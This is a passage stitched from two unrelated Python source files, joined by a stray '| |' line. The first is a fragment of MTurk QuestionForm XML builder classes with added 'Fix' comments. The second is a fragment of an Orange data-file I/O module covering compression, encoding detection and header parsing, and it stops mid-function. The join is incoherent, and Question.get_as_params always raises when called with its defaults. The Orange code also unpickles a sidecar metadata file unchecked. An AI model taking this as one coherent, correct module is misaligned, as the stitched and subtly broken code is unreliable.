    ``get_as_xml()``; their output is embedded verbatim.
    """
    QUESTION_XML_TEMPLATE = """<Question><QuestionIdentifier>%s</QuestionIdentifier>%s<IsRequired>%s</IsRequired>%s%s</Question>"""
    DISPLAY_NAME_XML_TEMPLATE = """<DisplayName>%s</DisplayName>"""

    def __init__(self, identifier, content, answer_spec, is_required=False, display_name=None):
        self.identifier = identifier
        self.content = content
        self.answer_spec = answer_spec
        self.is_required = is_required
        self.display_name = display_name

    def get_as_params(self, label='Question', identifier=None):
        """Return ``{label: xml}``; an identifier must be supplied."""
        if identifier is None:
            raise ValueError("identifier (QuestionIdentifier) is required per MTurk spec.")
        return {label: self.get_as_xml()}

    def get_as_xml(self):
        """Serialize this question to its MTurk XML representation."""
        display_name_xml = (
            self.DISPLAY_NAME_XML_TEMPLATE % (self.display_name)
            if self.display_name else '')
        parts = (self.identifier,
                 display_name_xml,
                 str(self.is_required).lower(),
                 self.content.get_as_xml(),
                 self.answer_spec.get_as_xml())
        return Question.QUESTION_XML_TEMPLATE % parts
class ExternalQuestion(object):
    """An MTurk ExternalQuestion: a URL rendered in an iframe of a
    given height."""
    EXTERNAL_QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2006-07-14/ExternalQuestion.xsd"
    EXTERNAL_QUESTION_XML_TEMPLATE = """<ExternalQuestion xmlns="%s"><ExternalURL>%s</ExternalURL><FrameHeight>%s</FrameHeight></ExternalQuestion>"""

    def __init__(self, external_url, frame_height):
        self.external_url = external_url
        self.frame_height = frame_height

    def get_as_params(self, label='ExternalQuestion'):
        """Return ``{label: xml}`` suitable for an API request."""
        return {label: self.get_as_xml()}

    def get_as_xml(self):
        """Serialize to ExternalQuestion XML with its schema namespace."""
        fields = (ExternalQuestion.EXTERNAL_QUESTIONFORM_SCHEMA_LOCATION,
                  self.external_url,
                  self.frame_height)
        return ExternalQuestion.EXTERNAL_QUESTION_XML_TEMPLATE % fields
class OrderedContent(object):
    """An ordered sequence of (field, value) content items, each
    rendered to XML by a per-field handler."""

    def __init__(self):
        self.items = []

    def append(self, field, value):
        """Append one item; *field* selects the XML handler, *value*
        its payload."""
        self.items.append((field, value))

    def get_binary_xml(self, field, value):
        """Render a Binary item from a dict with keys type/subtype/
        dataurl/alttext."""
        return """
<Binary>
<MimeType>
<Type>%s</Type>
<SubType>%s</SubType>
</MimeType>
<DataURL>%s</DataURL>
<AltText>%s</AltText>
</Binary>""" % (value['type'],
                value['subtype'],
                value['dataurl'],
                value['alttext'])

    def get_application_xml(self, field, value):
        raise NotImplementedError("Application question content is not yet supported.")

    def get_as_xml(self):
        """Serialize all items, in insertion order, to one XML string."""
        def plain(f, v):
            # Generic <Field>value</Field> wrapper.
            return '<%s>%s</%s>' % (f, v, f)

        def bulleted(_, entries):
            body = ''.join('<ListItem>%s</ListItem>' % e for e in entries)
            return '<List>%s</List>' % body

        def formatted(_, content):
            return "<FormattedContent><![CDATA[%s]]></FormattedContent>" % content

        handlers = {
            'List': bulleted,
            'Application': self.get_application_xml,
            'Binary': self.get_binary_xml,
            'FormattedContent': formatted,
        }
        return ''.join(handlers.get(field, plain)(field, value)
                       for field, value in self.items)
class Overview(object):
    """An MTurk Overview block: ordered content wrapped in
    ``<Overview>`` tags."""
    OVERVIEW_XML_TEMPLATE = """<Overview>%s</Overview>"""

    def __init__(self):
        self.ordered_content = OrderedContent()

    def append(self, field, value):
        """Delegate to the underlying OrderedContent."""
        self.ordered_content.append(field, value)

    def get_as_params(self, label='Overview'):
        """Return ``{label: xml}`` suitable for an API request."""
        return {label: self.get_as_xml()}

    def get_as_xml(self):
        """Serialize the accumulated content inside the Overview wrapper."""
        return Overview.OVERVIEW_XML_TEMPLATE % (self.ordered_content.get_as_xml())
class QuestionForm(object):
    """Top-level MTurk QuestionForm document: serializes its appended
    items (Question/Overview objects) in order inside the namespaced
    root element."""
    QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2005-10-01/QuestionForm.xsd"
    QUESTIONFORM_XML_TEMPLATE = """<QuestionForm xmlns="%s">%s</QuestionForm>"""

    def __init__(self):
        self.items = []

    def append(self, item):
        """Append one item exposing ``get_as_xml()``."""
        self.items.append(item)

    def get_as_xml(self):
        """Serialize every item and wrap the result in the form root."""
        body = ''.join(item.get_as_xml() for item in self.items)
        return QuestionForm.QUESTIONFORM_XML_TEMPLATE % (
            QuestionForm.QUESTIONFORM_SCHEMA_LOCATION, body)
class QuestionContent(object):
    """The content portion of a Question: ordered content wrapped in
    ``<QuestionContent>`` tags."""
    QUESTIONCONTENT_XML_TEMPLATE = """<QuestionContent>%s</QuestionContent>"""

    def __init__(self):
        self.ordered_content = OrderedContent()

    def append(self, field, value):
        """Delegate to the underlying OrderedContent."""
        self.ordered_content.append(field, value)

    def get_as_xml(self):
        """Serialize the accumulated content inside the wrapper element."""
        return QuestionContent.QUESTIONCONTENT_XML_TEMPLATE % (self.ordered_content.get_as_xml())
class AnswerSpecification(object):
    """Wraps a concrete answer spec (FreeTextAnswer, SelectionAnswer,
    FileUploadAnswer, ...) in ``<AnswerSpecification>`` tags.

    Fix: removed the dead local ``values = ()`` (marked TODO) from
    ``get_as_xml`` — it was never used.
    """
    ANSWERSPECIFICATION_XML_TEMPLATE = """<AnswerSpecification>%s</AnswerSpecification>"""

    def __init__(self, spec):
        self.spec = spec

    def get_as_xml(self):
        """Serialize the wrapped spec inside the AnswerSpecification element."""
        return AnswerSpecification.ANSWERSPECIFICATION_XML_TEMPLATE % self.spec.get_as_xml()
class FreeTextAnswer(object):
    """A free-text answer spec with optional numeric, length, regex and
    default-text constraints.

    Fix: the min/max length attributes were built from the raw template
    strings without applying the ``%`` operator, so the emitted XML
    literally contained ``minLength="%d"`` instead of the configured
    values (the IsNumeric branch already formatted correctly).
    """
    FREETEXTANSWER_XML_TEMPLATE = """<FreeTextAnswer>%s%s</FreeTextAnswer>""" # (constraints, default)
    FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE = """<Constraints>%s%s%s</Constraints>""" # (is_numeric_xml, length_xml, regex_xml)
    FREETEXTANSWER_LENGTH_XML_TEMPLATE = """<Length %s %s />""" # (min_length_attr, max_length_attr)
    FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE = """<IsNumeric %s %s />""" # (min_value_attr, max_value_attr)
    FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE = """<DefaultText>%s</DefaultText>""" # (default)

    def __init__(self, default=None, min_length=None, max_length=None, is_numeric=False, min_value=None, max_value=None, format_regex=None):
        self.default = default
        self.min_length = min_length
        self.max_length = max_length
        self.is_numeric = is_numeric
        self.min_value = min_value
        self.max_value = max_value
        self.format_regex = format_regex

    def get_as_xml(self):
        """Serialize to FreeTextAnswer XML, emitting only the constraint
        elements that are actually configured."""
        is_numeric_xml = ""
        if self.is_numeric:
            min_value_attr = ""
            max_value_attr = ""
            if self.min_value:
                min_value_attr = """minValue="%d" """ % self.min_value
            if self.max_value:
                max_value_attr = """maxValue="%d" """ % self.max_value
            is_numeric_xml = FreeTextAnswer.FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE % (min_value_attr, max_value_attr)
        length_xml = ""
        if self.min_length or self.max_length:
            min_length_attr = ""
            max_length_attr = ""
            if self.min_length:
                # FIX: apply the format operator (previously omitted).
                min_length_attr = """minLength="%d" """ % self.min_length
            if self.max_length:
                # FIX: apply the format operator (previously omitted).
                max_length_attr = """maxLength="%d" """ % self.max_length
            length_xml = FreeTextAnswer.FREETEXTANSWER_LENGTH_XML_TEMPLATE % (min_length_attr, max_length_attr)
        regex_xml = ""
        if self.format_regex:
            format_regex_attribs = '''regex="%s"''' %self.format_regex['regex']
            error_text = self.format_regex.get('error_text', None)
            if error_text:
                format_regex_attribs += ' errorText="%s"' %error_text
            flags = self.format_regex.get('flags', None)
            if flags:
                format_regex_attribs += ' flags="%s"' %flags
            regex_xml = """<AnswerFormatRegex %s/>""" %format_regex_attribs
        constraints_xml = ""
        if is_numeric_xml or length_xml or regex_xml:
            constraints_xml = FreeTextAnswer.FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE % (is_numeric_xml, length_xml, regex_xml)
        default_xml = ""
        if self.default is not None:
            default_xml = FreeTextAnswer.FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE % self.default
        return FreeTextAnswer.FREETEXTANSWER_XML_TEMPLATE % (constraints_xml, default_xml)
class FileUploadAnswer(object):
    """A file-upload answer spec bounded by min/max file sizes in bytes.

    NOTE(review): the TEMLPATE attribute name is a historical typo kept
    for backward compatibility.
    """
    FILEUPLOADANSWER_XML_TEMLPATE = """<FileUploadAnswer><MinFileSizeInBytes>%d</MinFileSizeInBytes><MaxFileSizeInBytes>%d</MaxFileSizeInBytes></FileUploadAnswer>""" # (min, max)
    DEFAULT_MIN_SIZE = 1024 # 1K (completely arbitrary!)
    DEFAULT_MAX_SIZE = 5 * 1024 * 1024 # 5MB (completely arbitrary!)

    def __init__(self, min=None, max=None):
        # Fall back to the arbitrary defaults when bounds are not given.
        self.min = FileUploadAnswer.DEFAULT_MIN_SIZE if min is None else min
        self.max = FileUploadAnswer.DEFAULT_MAX_SIZE if max is None else max

    def get_as_xml(self):
        """Serialize to FileUploadAnswer XML."""
        return FileUploadAnswer.FILEUPLOADANSWER_XML_TEMLPATE % (self.min, self.max)
class SelectionAnswer(object):
    """
    A class to generate SelectionAnswer XML data structures.
    Does not yet implement Binary selection options.
    """
    SELECTIONANSWER_XML_TEMPLATE = """<SelectionAnswer>%s%s<Selections>%s</Selections></SelectionAnswer>""" # % (count_xml, style_xml, selections_xml)
    SELECTION_XML_TEMPLATE = """<Selection><SelectionIdentifier>%s</SelectionIdentifier>%s</Selection>""" # (identifier, value_xml)
    SELECTION_VALUE_XML_TEMPLATE = """<%s>%s</%s>""" # (type, value, type)
    STYLE_XML_TEMPLATE = """<StyleSuggestion>%s</StyleSuggestion>""" # (style)
    MIN_SELECTION_COUNT_XML_TEMPLATE = """<MinSelectionCount>%s</MinSelectionCount>""" # count
    MAX_SELECTION_COUNT_XML_TEMPLATE = """<MaxSelectionCount>%s</MaxSelectionCount>""" # count
    ACCEPTED_STYLES = ['radiobutton', 'dropdown', 'checkbox', 'list', 'combobox', 'multichooser']
    OTHER_SELECTION_ELEMENT_NAME = 'OtherSelection'

    def __init__(self, min=1, max=1, style=None, selections=None, type='text', other=False):
        # Validate the suggested widget style up front.
        if style is None:
            self.style_suggestion = None
        elif style in SelectionAnswer.ACCEPTED_STYLES:
            self.style_suggestion = style
        else:
            raise ValueError("style '%s' not recognized; should be one of %s" % (style, ', '.join(SelectionAnswer.ACCEPTED_STYLES)))
        if selections is None:
            raise ValueError("SelectionAnswer.__init__(): selections must be a non-empty list of (content, identifier) tuples")
        self.selections = selections
        self.min_selections = min
        self.max_selections = max
        assert len(selections) >= self.min_selections, "# of selections is less than minimum of %d" % self.min_selections
        #assert len(selections) <= self.max_selections, "# of selections exceeds maximum of %d" % self.max_selections
        self.type = type
        self.other = other

    def get_as_xml(self):
        """Serialize to SelectionAnswer XML."""
        if self.type == 'text':
            value_tag = "Text"
        elif self.type == 'binary':
            value_tag = "Binary"
        else:
            raise ValueError("illegal type: %s; must be either 'text' or 'binary'" % str(self.type))
        # Build the <Selection> list from (content, identifier) tuples.
        pieces = []
        for content, ident in self.selections:
            inner = SelectionAnswer.SELECTION_VALUE_XML_TEMPLATE % (value_tag, content, value_tag)
            pieces.append(SelectionAnswer.SELECTION_XML_TEMPLATE % (ident, inner))
        selections_xml = ''.join(pieces)
        if self.other:
            # Append an OtherSelection element; a FreeTextAnswer supplies
            # its own XML with the element name swapped.
            if hasattr(self.other, 'get_as_xml'):
                assert type(self.other) == FreeTextAnswer, 'OtherSelection can only be a FreeTextAnswer'
                selections_xml += self.other.get_as_xml().replace('FreeTextAnswer', 'OtherSelection')
            else:
                selections_xml += "<OtherSelection />"
        style_xml = ""
        if self.style_suggestion is not None:
            style_xml = SelectionAnswer.STYLE_XML_TEMPLATE % self.style_suggestion
        # Radio buttons are single-choice, so the count elements are omitted.
        count_xml = ""
        if self.style_suggestion != 'radiobutton':
            count_xml = SelectionAnswer.MIN_SELECTION_COUNT_XML_TEMPLATE % self.min_selections
            count_xml += SelectionAnswer.MAX_SELECTION_COUNT_XML_TEMPLATE % self.max_selections
        return SelectionAnswer.SELECTIONANSWER_XML_TEMPLATE % (count_xml, style_xml, selections_xml)
| |
import contextlib
import csv
import locale
import pickle
import re
import subprocess
import sys
import warnings
from tempfile import NamedTemporaryFile
from os import path, unlink
from ast import literal_eval
from math import isnan
from numbers import Number
from itertools import chain, repeat
from functools import lru_cache
from collections import OrderedDict
from urllib.parse import urlparse, unquote as urlunquote
from urllib.request import urlopen
import bottleneck as bn
import numpy as np
from chardet.universaldetector import UniversalDetector
from Orange.data import (
_io, is_discrete_values, MISSING_VALUES, Table, Domain, Variable,
DiscreteVariable, StringVariable, ContinuousVariable, TimeVariable,
)
from Orange.util import Registry, flatten, namegen
_IDENTITY = lambda i: i
class Compression:
    """Supported compression extensions"""
    # File-name suffixes recognized by open_compressed() below.
    GZIP = '.gz'
    BZIP2 = '.bz2'
    XZ = '.xz'
    # Tuple form so it can be passed directly to str.endswith().
    all = (GZIP, BZIP2, XZ)
def open_compressed(filename, *args, _open=open, **kwargs):
    """Return seamlessly decompressed open file handle for `filename`.

    A non-string argument is assumed to already be an open file-like object
    and is returned unchanged. For string names, the opener is chosen by
    extension (gzip/bz2/lzma), defaulting to the builtin ``open``.
    """
    if not isinstance(filename, str):
        # Already a file object (or arbitrary handle); pass it through.
        return filename
    if filename.endswith(Compression.GZIP):
        from gzip import open as _open
    elif filename.endswith(Compression.BZIP2):
        from bz2 import open as _open
    elif filename.endswith(Compression.XZ):
        from lzma import open as _open
    return _open(filename, *args, **kwargs)
def detect_encoding(filename):
    """
    Detect encoding of `filename`, which can be a ``str`` filename, a
    ``file``-like object, or ``bytes``.

    Strategy: for uncompressed on-disk files, ask the Unix ``file`` utility
    first (fast); fall back to chardet's UniversalDetector on the first
    ~48 kB of content. Returns an encoding name string, or ``None`` when
    the detector cannot decide.
    """
    # Try with Unix file utility first because it's faster (~10ms vs 100ms)
    if isinstance(filename, str) and not filename.endswith(Compression.all):
        try:
            with subprocess.Popen(('file', '--brief', '--mime-encoding', filename),
                                  stdout=subprocess.PIPE) as process:
                process.wait()
                if process.returncode == 0:
                    encoding = process.stdout.read().strip()
                    # file only supports these encodings; for others it says
                    # unknown-8bit or binary. So we give chardet a chance to do
                    # better
                    if encoding in (b'utf-8', b'us-ascii', b'iso-8859-1',
                                    b'utf-7', b'utf-16le', b'utf-16be', b'ebcdic'):
                        return encoding.decode('us-ascii')
        except OSError: pass  # 'file' utility not available (e.g. Windows)
    # file not available or unable to guess the encoding, have chardet do it
    detector = UniversalDetector()
    # We examine only first N 4kB blocks of file because chardet is really slow
    MAX_BYTES = 4*1024*12
    def _from_file(f):
        # Feed a bounded prefix; result may have encoding=None if undecided.
        detector.feed(f.read(MAX_BYTES))
        detector.close()
        return detector.result.get('encoding')
    if isinstance(filename, str):
        with open_compressed(filename, 'rb') as f:
            return _from_file(f)
    elif isinstance(filename, bytes):
        detector.feed(filename[:MAX_BYTES])
        detector.close()
        return detector.result.get('encoding')
    elif hasattr(filename, 'encoding'):
        # Text-mode file objects already know their encoding.
        return filename.encoding
    else:  # assume file-like object that you can iter through
        return _from_file(filename)
class Flags:
    """Parser for column flags (i.e. third header row)"""
    # Flags are space-separated; a backslash escapes a literal space.
    DELIMITER = ' '
    _RE_SPLIT = re.compile(r'(?<!\\)' + DELIMITER).split
    _RE_ATTR_UNQUOTED_STR = re.compile(r'^[a-zA-Z_]').match
    # Maps long flag name -> short alias ('' means no alias).
    ALL = OrderedDict((
        ('class', 'c'),
        ('ignore', 'i'),
        ('meta', 'm'),
        ('weight', 'w'),
        ('.+?=.*?', ''),  # general key=value attributes
    ))
    _RE_ALL = re.compile(r'^({})$'.format('|'.join(filter(None, flatten(ALL.items())))))
    def __init__(self, flags):
        # Initialize every short-alias attribute (c/i/m/w) to False.
        for v in filter(None, self.ALL.values()):
            setattr(self, v, False)
        self.attributes = {}
        for flag in flags or []:
            flag = flag.strip()
            if self._RE_ALL.match(flag):
                if '=' in flag:
                    # key=value attribute; values not starting with a letter
                    # or underscore are parsed with literal_eval.
                    k, v = flag.split('=', 1)
                    self.attributes[k] = (v if Flags._RE_ATTR_UNQUOTED_STR(v) else
                                          literal_eval(v) if v else
                                          '')
                else:
                    # Set both the given spelling and its counterpart; for a
                    # short flag ALL.get(flag, '') is '' and a harmless
                    # empty-name attribute is set via setattr.
                    setattr(self, flag, True)
                    setattr(self, self.ALL.get(flag, ''), True)
            elif flag:
                warnings.warn('Invalid attribute flag \'{}\''.format(flag))
    @staticmethod
    def join(iterable, *args):
        # Inverse of split(): escape embedded delimiters, then join.
        return Flags.DELIMITER.join(i.strip().replace(Flags.DELIMITER, '\\' + Flags.DELIMITER)
                                    for i in chain(iterable, args)).lstrip()
    @staticmethod
    def split(s):
        # Split on unescaped delimiters and unescape the parts.
        return [i.replace('\\' + Flags.DELIMITER, Flags.DELIMITER)
                for i in Flags._RE_SPLIT(s)]
# Matches discrete specification where all the values are listed, space-separated
_RE_DISCRETE_LIST = re.compile(r'^\s*[^\s]+(\s[^\s]+)+\s*$')
# Matches a type header cell: a discrete value list, any TYPE_HEADERS entry
# of a registered Variable subclass, or empty.
_RE_TYPES = re.compile(r'^\s*({}|{}|)\s*$'.format(_RE_DISCRETE_LIST.pattern,
                                                  '|'.join(flatten(getattr(vartype, 'TYPE_HEADERS')
                                                                   for vartype in Variable.registry.values()))))
# Matches a (possibly empty) space-separated run of known flags and
# key=value pairs -- i.e. a valid third header-row cell.
_RE_FLAGS = re.compile(r'^\s*( |{}|)*\s*$'.format('|'.join(flatten(filter(None, i) for i in Flags.ALL.items()))))
class FileFormatMeta(Registry):
    """Metaclass for FileFormat: registers subclasses and exposes
    class-level lookup tables (readers/writers/names) keyed by extension."""
    def __new__(cls, name, bases, attrs):
        newcls = super().__new__(cls, name, bases, attrs)
        # Optionally add compressed versions of extensions as supported
        if getattr(newcls, 'SUPPORT_COMPRESSED', False):
            new_extensions = list(getattr(newcls, 'EXTENSIONS', ()))
            for compression in Compression.all:
                for ext in newcls.EXTENSIONS:
                    new_extensions.append(ext + compression)
            newcls.EXTENSIONS = tuple(new_extensions)
        return newcls
    @property
    def formats(self):
        # All registered FileFormat subclasses.
        return self.registry.values()
    @lru_cache(5)
    def _ext_to_attr_if_attr2(self, attr, attr2):
        """
        Return ``{ext: `attr`, ...}`` dict if ``cls`` has `attr2`.
        If `attr` is '', return ``{ext: cls, ...}`` instead.
        """
        # NOTE: lru_cache keys on `self`, which here is a class object and
        # therefore lives for the process lifetime anyway.
        return OrderedDict((ext, getattr(cls, attr, cls))
                           for cls in self.registry.values()
                           if hasattr(cls, attr2)
                           for ext in getattr(cls, 'EXTENSIONS', []))
    @property
    def names(self):
        # {extension: human-readable description}
        return self._ext_to_attr_if_attr2('DESCRIPTION', '__class__')
    @property
    def writers(self):
        # {extension: class} for classes defining write_file().
        return self._ext_to_attr_if_attr2('', 'write_file')
    @property
    def readers(self):
        # {extension: class} for classes defining read().
        return self._ext_to_attr_if_attr2('', 'read')
    @property
    def img_writers(self):
        return self._ext_to_attr_if_attr2('', 'write_image')
    @property
    def graph_writers(self):
        return self._ext_to_attr_if_attr2('', 'write_graph')
class FileFormat(metaclass=FileFormatMeta):
    """
    Subclasses set the following attributes and override the following methods:
        EXTENSIONS = ('.ext1', '.ext2', ...)
        DESCRIPTION = 'human-readable file format description'
        SUPPORT_COMPRESSED = False
        def read(self):
            ...  # load headers, data, ...
            return self.data_table(data, headers)
        @classmethod
        def write_file(cls, filename, data):
            ...
            self.write_headers(writer.write, data)
            writer.writerows(data)
    Wrapper FileFormat.data_table() returns Orange.data.Table from `data`
    iterable (list (rows) of lists of values (cols)).
    """
    PRIORITY = 10000  # Sort order in OWSave widget combo box, lower is better
    def __init__(self, filename):
        """
        Parameters
        ----------
        filename : str
            name of the file to open
        """
        self.filename = filename
        # Currently selected sheet (only meaningful for multi-sheet formats).
        self.sheet = None
    @property
    def sheets(self):
        """FileFormats with a notion of sheets should override this property
        to return a list of sheet names in the file.
        Returns
        -------
        a list of sheet names
        """
        return ()
    def select_sheet(self, sheet):
        """Select sheet to be read
        Parameters
        ----------
        sheet : str
            sheet name
        """
        self.sheet = sheet
    @classmethod
    def get_reader(cls, filename):
        """Return reader instance that can be used to read the file
        Parameters
        ----------
        filename : str
        Returns
        -------
        FileFormat
        Raises
        ------
        IOError
            if no registered reader matches the filename's extension
        """
        for ext, reader in cls.readers.items():
            if filename.endswith(ext):
                return reader(filename)
        raise IOError('No readers for file "{}"'.format(filename))
    @classmethod
    def write(cls, filename, data):
        # Thin alias so callers can say Format.write(...) uniformly.
        return cls.write_file(filename, data)
    @classmethod
    def write_table_metadata(cls, filename, data):
        # Persist table.attributes next to the file as '<name>.metadata'
        # (skipped for non-string filenames and empty attribute dicts).
        if isinstance(filename, str) and getattr(data, 'attributes', {}):
            with open(filename + '.metadata', 'wb') as f:
                pickle.dump(data.attributes, f, pickle.HIGHEST_PROTOCOL)
    @classmethod
    def set_table_metadata(cls, filename, table):
        # Counterpart of write_table_metadata(): load attributes if present.
        # NOTE(review): unpickling trusts the sidecar file's contents.
        if isinstance(filename, str) and path.exists(filename + '.metadata'):
            with open(filename + '.metadata', 'rb') as f:
                table.attributes = pickle.load(f)
    @classmethod
    def locate(cls, filename, search_dirs=('.',)):
        """Locate a file with given filename that can be opened by one
        of the available readers.
        Parameters
        ----------
        filename : str
        search_dirs : Iterable[str]
        Returns
        -------
        str
            Absolute path to the file
        Raises
        ------
        IOError
            if the file is not found in any search directory, even after
            trying to append each known reader extension
        """
        if path.exists(filename):
            return filename
        for directory in search_dirs:
            absolute_filename = path.join(directory, filename)
            if path.exists(absolute_filename):
                break
            # Try appending each known extension to the candidate path.
            for ext in cls.readers:
                if filename.endswith(ext):
                    break
                if path.exists(absolute_filename + ext):
                    absolute_filename += ext
                    break
            if path.exists(absolute_filename):
                break
        else:
            # for/else: no directory produced an existing path.
            # NOTE(review): with an empty search_dirs this leaves
            # absolute_filename as "" which then raises below -- intended?
            absolute_filename = ""
        if not path.exists(absolute_filename):
            raise IOError('File "{}" was not found.'.format(filename))
        return absolute_filename
    @staticmethod
    def open(filename, *args, **kwargs):
        """
        Format handlers can use this method instead of the builtin ``open()``
        to transparently (de)compress files if requested (according to
        `filename` extension). Set ``SUPPORT_COMPRESSED=True`` if you use this.
        """
        return open_compressed(filename, *args, **kwargs)
    @staticmethod
    def parse_headers(data):
        """Return (header rows, rest of data) as discerned from `data`"""
        def is_number(item):
            try: float(item)
            except ValueError: return False
            return True
        # Second row items are type identifiers
        def header_test2(items):
            return all(map(_RE_TYPES.match, items))
        # Third row items are flags and column attributes (attr=value)
        def header_test3(items):
            return all(map(_RE_FLAGS.match, items))
        data = iter(data)
        header_rows = []
        # Try to parse a three-line header
        lines = []
        try:
            lines.append(list(next(data)))
            lines.append(list(next(data)))
            lines.append(list(next(data)))
        except StopIteration:
            # Fewer than three rows total; push the read rows back.
            lines, data = [], chain(lines, data)
        if lines:
            l1, l2, l3 = lines
            # Three-line header if line 2 & 3 match (1st line can be anything)
            if header_test2(l2) and header_test3(l3):
                header_rows = [l1, l2, l3]
            else:
                lines, data = [], chain((l1, l2, l3), data)
        # Try to parse a single-line header
        if not header_rows:
            try: lines.append(list(next(data)))
            except StopIteration: pass
            if lines:
                # Header if none of the values in line 1 parses as a number
                if not all(is_number(i) for i in lines[0]):
                    header_rows = [lines[0]]
                else:
                    data = chain(lines, data)
        return header_rows, data
    @classmethod
    def data_table(self, data, headers=None):
        """
        Return Orange.data.Table given rows of `headers` (iterable of iterable)
        and rows of `data` (iterable of iterable; if ``numpy.ndarray``, might
        as well **have it sorted column-major**, e.g. ``order='F'``).
        Basically, the idea of subclasses is to produce those two iterables,
        however they might.
        If `headers` is not provided, the header rows are extracted from `data`,
        assuming they precede it.

        NOTE(review): declared @classmethod but the first parameter is named
        ``self``; it is bound to the class object.
        """
        if not headers:
            headers, data = self.parse_headers(data)
        # Consider various header types (single-row, two-row, three-row, none)
        if 3 == len(headers):
            names, types, flags = map(list, headers)
        else:
            if 1 == len(headers):
                HEADER1_FLAG_SEP = '#'
                # First row format either:
                #   1) delimited column names
                #   2) -||- with type and flags prepended, separated by #,
                #      e.g. d#sex,c#age,cC#IQ
                _flags, names = zip(*[i.split(HEADER1_FLAG_SEP, 1) if HEADER1_FLAG_SEP in i else ('', i)
                                      for i in headers[0]])
                names = list(names)
            elif 2 == len(headers):
                names, _flags = map(list, headers)
            else:
                # Use heuristics for everything
                names, _flags = [], []
            # Uppercase chars encode the type, lowercase chars the flags.
            types = [''.join(filter(str.isupper, flag)).lower() for flag in _flags]
            flags = [Flags.join(filter(str.islower, flag)) for flag in _flags]
        # Determine maximum row length
        rowlen = max(map(len, (names, types, flags)))
        def _equal_length(lst):
            # Pad with '' in place; returns the same (mutated) list.
            lst.extend(['']*(rowlen - len(lst)))
            return lst
        # Ensure all data is of equal width in a column-contiguous array
        data = np.array([_equal_length(list(row)) for row in data if any(row)],
                        copy=False, dtype=object, order='F')
        # Data may actually be longer than headers were
        try: rowlen = data.shape[1]
        except IndexError: pass
        else:
            for lst in (names, types, flags):
                _equal_length(lst)
        NAMEGEN = namegen('Feature ', 1)
        Xcols, attrs = [], []
        Mcols, metas = [], []
        Ycols, clses = [], []
        Wcols = []
        # Iterate through the columns
        for col in range(rowlen):
            flag = Flags(Flags.split(flags[col]))
            if flag.i: continue  # 'ignore' flag: drop the column entirely
            type_flag = types and types[col].strip()
            try:
                orig_values = [np.nan if i in MISSING_VALUES else i
                               for i in (i.strip() for i in data[:, col])]
            except IndexError:
                # No data instances leads here
                orig_values = []
                # In this case, coltype could be anything. It's set as-is
                # only to satisfy test_table.TableTestCase.test_append
                coltype = DiscreteVariable
            coltype_kwargs = {}
            valuemap = []
            values = orig_values
            # Resolve the column's variable type from its type header cell.
            if type_flag in StringVariable.TYPE_HEADERS:
                coltype = StringVariable
            elif type_flag in ContinuousVariable.TYPE_HEADERS:
                coltype = ContinuousVariable
                try:
                    values = [float(i) for i in orig_values]
                except ValueError:
                    # Re-scan to report the first offending row number.
                    for row, num in enumerate(orig_values):
                        try: float(num)
                        except ValueError: break
                    raise ValueError('Non-continuous value in (1-based) '
                                     'line {}, column {}'.format(row + len(headers) + 1,
                                                                 col + 1))
            elif type_flag in TimeVariable.TYPE_HEADERS:
                coltype = TimeVariable
            elif (type_flag in DiscreteVariable.TYPE_HEADERS or
                  _RE_DISCRETE_LIST.match(type_flag)):
                if _RE_DISCRETE_LIST.match(type_flag):
                    # Explicit value list fixes the value order.
                    valuemap = Flags.split(type_flag)
                    coltype_kwargs.update(ordered=True)
                else:
                    valuemap = sorted(set(orig_values) - {np.nan})
            else:
                # No known type specified, use heuristics
                is_discrete = is_discrete_values(orig_values)
                if is_discrete:
                    valuemap = sorted(is_discrete)
                else:
                    try: values = [float(i) for i in orig_values]
                    except ValueError:
                        tvar = TimeVariable('_')
                        try: values = [tvar.parse(i) for i in orig_values]
                        except ValueError:
                            coltype = StringVariable
                        else:
                            coltype = TimeVariable
                    else:
                        coltype = ContinuousVariable
            if valuemap:
                # Map discrete data to ints
                def valuemap_index(val):
                    try: return valuemap.index(val)
                    except ValueError: return np.nan
                values = np.vectorize(valuemap_index, otypes=[float])(orig_values)
                coltype = DiscreteVariable
                coltype_kwargs.update(values=valuemap)
            if coltype is StringVariable:
                values = ['' if i is np.nan else i
                          for i in orig_values]
            # Route the column to X/Y/metas/weights based on its flags.
            if flag.m or coltype is StringVariable:
                append_to = (Mcols, metas)
            elif flag.w:
                append_to = (Wcols, None)
            elif flag.c:
                append_to = (Ycols, clses)
            else:
                append_to = (Xcols, attrs)
            cols, domain_vars = append_to
            cols.append(col)
            if domain_vars is not None:
                if names and names[col]:
                    # Use existing variable if available
                    var = coltype.make(names[col].strip(), **coltype_kwargs)
                else:
                    # Never use existing for un-named variables
                    var = coltype(next(NAMEGEN), **coltype_kwargs)
                var.attributes.update(flag.attributes)
                domain_vars.append(var)
                # Reorder discrete values to match existing variable
                if var.is_discrete and not var.ordered:
                    new_order, old_order = var.values, coltype_kwargs.get('values', var.values)
                    if new_order != old_order:
                        # Shift by an offset first so remapping in place
                        # cannot collide with not-yet-remapped indices.
                        offset = len(new_order)
                        column = values if data.ndim > 1 else data
                        column += offset
                        for i, val in enumerate(var.values):
                            try: oldval = old_order.index(val)
                            except ValueError: continue
                            bn.replace(column, offset + oldval, new_order.index(val))
            if coltype is TimeVariable:
                # Re-parse the values because only now after coltype.make call
                # above, variable var is the correct one
                values = [var.parse(i) for i in orig_values]
                # Write back the changed data. This is needed to pass the
                # correct, converted values into Table.from_numpy below
                try: data[:, col] = values
                except IndexError: pass
        domain = Domain(attrs, clses, metas)
        if not data.size:
            return Table.from_domain(domain, 0)
        table = Table.from_numpy(domain,
                                 data[:, Xcols].astype(float, order='C'),
                                 data[:, Ycols].astype(float, order='C'),
                                 data[:, Mcols].astype(object, order='C'),
                                 data[:, Wcols].astype(float, order='C'))
        return table
    @staticmethod
    def header_names(data):
        # First header row: optional 'weights' column plus variable names.
        return ['weights'] * data.has_weights() + \
               [v.name for v in chain(data.domain.attributes,
                                      data.domain.class_vars,
                                      data.domain.metas)]
    @staticmethod
    def header_types(data):
        # Second header row: the type tag of each written column.
        def _vartype(var):
            if var.is_continuous or var.is_string:
